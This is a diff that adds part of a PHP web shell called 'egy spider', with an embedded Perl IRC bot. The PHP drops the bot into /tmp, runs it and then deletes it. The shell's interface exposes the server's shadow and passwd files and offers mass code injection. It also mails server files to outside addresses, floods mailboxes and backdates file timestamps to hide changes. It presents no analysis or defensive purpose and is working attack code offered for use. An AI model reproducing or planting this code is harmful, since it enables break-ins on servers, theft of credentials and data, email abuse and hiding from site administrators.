+   return unless $#_ == 1;
+   sendraw(\"MODE \$_[0] +b \$_[1]\");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw(\"MODE \$_[0] -b \$_[1]\");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\");
+}
+
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw(\"MODE \$_[0] \$_[1]\");
+}
+sub mode { modo(@_); }
+
+
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw(\"JOIN \$_[0]\");
+}
+sub p { part(@_); }
+sub part {sendraw(\"PART \$_[0]\");}
+
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw(\"NICK \$_[0]\");
+}
+
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw(\"INVITE \$_[1] \$_[0]\");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw(\"TOPIC \$_[0] \$_[1]\");
+}
+sub topic { topico(@_); }
+
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw(\"WHOIS \$_[0]\");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw(\"WHO \$_[0]\");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw(\"NAMES \$_[0]\");
+}
+sub away {
+  sendraw(\"AWAY \$_[0]\");
+}
+sub back { away(); }
+sub quit {
+  sendraw(\"QUIT :\$_[0]\");
+}
+
+
+# DCC
+#########################
+
+
+package DCC;
+
+
+sub connections {
+   my @ready = \$dcc_sel->can_read(1);
+# return unless (@ready);
+   foreach my \$fh (@ready) {
+     my \$dcctipo = \$DCC{\$fh}{tipo};
+     my \$arquivo = \$DCC{\$fh}{arquivo};
+     my \$bytes = \$DCC{\$fh}{bytes};
+     my \$cur_byte = \$DCC{\$fh}{curbyte};
+     my \$nick = \$DCC{\$fh}{nick};
+
+
+
+
+     my \$msg;
+     my \$nread = sysread(\$fh, \$msg, 10240);
+
+
+     if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) {
+        \$DCC{\$fh}{status} = \"Cancelado\";
+        \$DCC{\$fh}{ftime} = time;
+        \$dcc_sel->remove(\$fh);
+        \$fh->close;
+        next;
+     }
+
+
+     if (\$dcctipo eq \"get\") {
+        \$DCC{\$fh}{curbyte} += length(\$msg);
+
+
+        my \$cur_byte = \$DCC{\$fh}{curbyte};
+
+
+        open(FILE, \">> \$arquivo\");
+        print FILE \"\$msg\" if (\$cur_byte <= \$bytes);
+        close(FILE);
+
+
+        my \$packbyte = pack(\"N\", \$cur_byte);
+        print \$fh \"\$packbyte\";
+
+
+
+
+        if (\$bytes == \$cur_byte) {
+           \$dcc_sel->remove(\$fh);
+           \$fh->close;
+           \$DCC{\$fh}{status} = \"Recebido\";
+           \$DCC{\$fh}{ftime} = time;
+           next;
+        }
+     } elsif (\$dcctipo eq \"send\") {
+          my \$send = \$fh->accept;
+          \$send->autoflush(1);
+          \$dcc_sel->add(\$send);
+          \$dcc_sel->remove(\$fh);
+          \$DCC{\$send}{tipo} = 'sendcon';
+          \$DCC{\$send}{itime} = time;
+          \$DCC{\$send}{nick} = \$nick;
+          \$DCC{\$send}{bytes} = \$bytes;
+          \$DCC{\$send}{curbyte} = 0;
+          \$DCC{\$send}{arquivo} = \$arquivo;
+          \$DCC{\$send}{ip} = \$send->peerhost;
+          \$DCC{\$send}{porta} = \$send->peerport;
+          \$DCC{\$send}{status} = \"Enviando\";
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, \"< \$arquivo\");
+          my \$fbytes;
+          read(FILE, \$fbytes, 1024);
+          print \$send \"\$fbytes\";
+          close FILE;
+# delete(\$DCC{\$fh});
+} elsif (\$dcctipo eq 'sendcon') {
+          my \$bytes_sended = unpack(\"N\", \$msg);
+          \$DCC{\$fh}{curbyte} = \$bytes_sended;
+          if (\$bytes_sended == \$bytes) {
+             \$fh->close;
+             \$dcc_sel->remove(\$fh);
+             \$DCC{\$fh}{status} = \"Enviado\";
+             \$DCC{\$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, \"< \$arquivo\");
+          seek(SENDFILE, \$bytes_sended, 0);
+          my \$send_bytes;
+          read(SENDFILE, \$send_bytes, 1024);
+          print \$fh \"\$send_bytes\";
+          close(SENDFILE);
+     }
+   }
+}
+##########################
+
+
+sub SEND {
+  my (\$nick, \$arquivo) = @_;
+  unless (-r \"\$arquivo\") {
+    return(0);
+  }
+
+
+  my \$dccark = \$arquivo;
+  \$dccark =~ s/[.*\/](\S+)/$1/;
+
+
+  my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'};
+  my \$longip = unpack(\"N\",inet_aton(\$meuip));
+
+
+  my @filestat = stat(\$arquivo);
+  my \$size_total=\$filestat[7];
+  if (\$size_total == 0) {
+     return(0);
+  }
+
+
+  my (\$porta, \$sendsock);
+  do {
+    \$porta = int rand(64511);
+    \$porta += 1024;
+    \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock);
+  } until \$sendsock;
+
+
+  \$DCC{\$sendsock}{tipo} = 'send';
+  \$DCC{\$sendsock}{nick} = \$nick;
+  \$DCC{\$sendsock}{bytes} = \$size_total;
+  \$DCC{\$sendsock}{arquivo} = \$arquivo;
+
+
+  &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\");
+
+
+}
+
+
+sub GET {
+  my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_;
+  return(0) if (-e \"\$arquivo\");
+  if (open(FILE, \"> \$arquivo\")) {
+     close FILE;
+  } else {
+    return(0);
+  }
+
+
+  my \$dccip=fixaddr(\$dcclongip);
+  return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1);
+  my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0);
+  \$dccsock->autoflush(1);
+  \$dcc_sel->add(\$dccsock);
+  \$DCC{\$dccsock}{tipo} = 'get';
+  \$DCC{\$dccsock}{itime} = time;
+  \$DCC{\$dccsock}{nick} = \$nick;
+  \$DCC{\$dccsock}{bytes} = \$bytes;
+  \$DCC{\$dccsock}{curbyte} = 0;
+  \$DCC{\$dccsock}{arquivo} = \$arquivo;
+  \$DCC{\$dccsock}{ip} = \$dccip;
+  \$DCC{\$dccsock}{porta} = \$dccporta;
+  \$DCC{\$dccsock}{status} = \"Recebendo\";
+}
+############################
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my \$socket = shift;
+  my \$sock_tipo = \$DCC{\$socket}{tipo};
+  unless (lc(\$sock_tipo) eq \"chat\") {
+    my \$nick = \$DCC{\$socket}{nick};
+    my \$arquivo = \$DCC{\$socket}{arquivo};
+    my \$itime = \$DCC{\$socket}{itime};
+    my \$ftime = time;
+    my \$status = \$DCC{\$socket}{status};
+    \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime});
+
+
+    my \$d_time = \$ftime-\$itime;
+
+
+    my \$cur_byte = \$DCC{\$socket}{curbyte};
+    my \$bytes_total = \$DCC{\$socket}{bytes};
+
+
+    my \$rate = 0;
+    \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0;
+    my \$porcen = (\$cur_byte*100)/\$bytes_total;
+
+
+    my (\$r_duv, \$p_duv);
+    if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       \$r_duv = $3; \$r_duv++ if $4 >= 5;
+       \$rate = \"$1\.$2\".\"\$r_duv\";
+    }
+    if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       \$p_duv = $3; \$p_duv++ if $4 >= 5;
+       \$porcen = \"$1\.$2\".\"\$p_duv\";
+    }
+    return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\");
+  }
+
+
+  return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+    my (\$address) = @_;
+
+
+    chomp \$address; # just in case, sigh.
+    if (\$address =~ /^\d+$/) {
+        return inet_ntoa(pack \"N\", \$address);
+    } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return \$address;
+    } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname(\$address))[4])[0]);
+    } else {
+        return;
+    }
+}
+############################
+";
+$bot = "/tmp/ircs.pl";
+$open = fopen($bot,"w");
+fputs($open,$file);
+fclose($open);
+$cmd="perl $bot";
+$cmd2="rm $bot";
+system($cmd);
+system($cmd2);
+$_POST['cmd']="echo \"Now script try connect to ircserver ...\"";
+
+
+}
+
+
+
+
+if(!isset($_COOKIE[$lang[$language.'_text137']])) {
+	$ust_u='';
+	if($unix && !$safe_mode){ 
+		foreach ($userful as $item) {
+			if(which($item)){$ust_u.=$item;} 
+		}
+	}
+	if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
+	if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
+	if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
+	if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
+	if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
+	if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
+	if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
+	if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
+	
+	$ust_u = trim($ust_u);
+}else {
+	$ust_u = trim($_COOKIE[$lang[$language.'_text137']]);
+}
+
+
+if(!isset($_COOKIE[$lang[$language.'_text138']])) {
+	$ust_d=''; 
+	if($unix && !$safe_mode){ 
+		foreach ($danger as $item) {
+			if(which($item)){$ust_d.=$item;} 
+		}
+	}
+	if(!$safe_mode){ 
+		foreach ($danger as $item) {
+			if(ps($item)){$ust_d.=$item;} 
+		}
+	}
+	if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";}
+	if(substr($ust_d,0,1)==",") {$ust_d[0]="";} 
+	
+	$ust_d = trim($ust_d);
+}else {
+	$ust_d = trim($_COOKIE[$lang[$language.'_text138']]);
+}
+
+
+if(!isset($_COOKIE[$lang[$language.'_text142']])) {
+
+
+	$select_downloaders='<select size="1" name=with>';
+	if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
+	if($unix && !$safe_mode){ 
+		foreach ($downloaders as $item) {
+			if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";} 
+		}
+	}
+	$select_downloaders .= '</select>';
+	if(substr($downloader,0,1)==",") {$downloader[0]="";} 
+	
+	$downloader=trim($downloader);
+
+
+}
+
+
+
+
+echo $head;
+echo '</head>';
+
+
+echo '<<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#dadada><tr><td bgcolor=#000000 width=120><font face=Comic Sans MS size=1>'.ws(2).'<DIV dir=ltr align=center><p><font style="font-weight: 500" face="Webdings" color="#800000" size="7">!</font></p>'.ws(2).'<DIV dir=ltr align=center><SPAN
+style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px">
+<SPAN
+style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">egy spider</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>'.
+
+
+'</center></font>'.$fe.'</td>'.'<td bgcolor=#333333><font face=#FFFFFF size=-2>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
+echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
+echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
+echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";
+
+
+echo "<br>";
+
+
+echo ws(2)."PHP Version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
+echo "</b>".ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; }
+echo "</b>".ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "MySQLi: <b>";
+$mysqli_on = @function_exists('mysqli_connect');
+if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "MSQL: <b>";
+$msql_on = @function_exists('msql_connect');
+if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "SQLite: <b>";
+$sqlite_on = @function_exists('sqlite_open');
+if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b><br>".ws(2);
+
+
+echo "Safe_Mode: <b>";
+echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
+echo "</b>".ws(2);
+echo "Open_Basedir: <b>";
+if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};}
+else {echo "<font color=green>NONE</font></b>";}
+echo ws(2)."Safe_Exec_Dir: <b>";
+if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+echo ws(2)."Safe_Gid: <b>";
+if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+echo ws(2)."Safe_Include_Dir: <b>";
+if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+echo ws(2)."Sql.safe_mode: <b>";
+if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+
+
+echo "<br>".ws(2);
+echo "Disable Functions : <b>";$df='ini_get  disable!';
+if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+
+
+if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);}
+elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';}
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."Free Space : <b>".view_size($free)."</b> Total Space: <b>".view_size($all)."</b>";
+
+
+
+
+if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";};
+
+
+if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";};
+
+
+if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";};
+
+
+
+
+echo "<br>".ws(2)."</b>";
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?' title=\"".$lang[$language.'_text160']."\"><b>Home</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?egy' title=\"".$lang[$language.'_text159']."\"><b>About EgY SpIdEr</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?news' title=\"".$lang[$language.'_text152']."\"><b>News</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?logout=1' title=\"".$lang[$language.'_text153']."\"><b>Logout</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=feedback' title=\"".$lang[$language.'_text180']."\"><b>Feedback & Contact Me </b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=qindx' title=\"".$lang[$language.'_text154']."\"><b>Quick index </b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=massbrowsersploit' title=\"".$lang[$language.'_text155']."\"><b>Mass Code Injection</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=showsrc' title=\"".$lang[$language.'_text156']."\"><b>File source </b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=zone' title=\"".$lang[$language.'_text157']."\"><b>Zone-h</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=encoder' title=\"".$lang[$language.'_text158']."\"><b>Hash Tools</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>PhpInfo</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>Php.Ini</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>Cpu</b></a> ".$rb;
+if(!$unix) {
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>SystemInfo</b></a> ".$rb;
+}else{
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>Syslog</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>Resolv</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>Hosts</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>Shadow</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>Passwd</b></a> ".$rb; 
+}
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>Tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>Delete</b></a> ".$rb;
+
+
+if($unix && !$safe_mode) 
+{ 
+ echo "<br>".ws(2)."</b>";
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>Procinfo</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>Version</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>Free</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>Dmesg</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>Vmstat</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>Interrupts</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>Realise1</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>Realise2</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
+
+
+ echo "<br>".ws(2)."</b>";
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>W</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>Who</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>Uptime</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>Last</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>Ps Aux</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>Service</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>Ifconfig</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>Netstat</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>Fstab</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>Fdisk</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb;
+}
+
+
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+
+
+if($unix){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+
+
+
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";  
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {  
+  if($file=moreread($_POST['loc_file'])){ $filedump = $file; }
+  else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+  if(!empty($_POST['cmd'])) 
+  {
+    $filename = @basename($_POST['loc_file']);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from egy spider shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'egy_spider@hotmail.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";                   
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
+ {
+ for($h=1;$h<=$_POST['mail_flood'];$h++){
+  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
+ }
+ err(6+$res);
+ $_POST['cmd']="";  
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(@mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+
+
+
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
+{
+if(!$_POST['file_name_r'])
+ {
+  $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
+  $datar = @strtotime($datar);
+  @touch($_POST['file_name'],$datar,$datar);}
+else{
+  @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
+}
+$_POST['cmd']="";
+}
+
+
+
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; }
+ elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } 
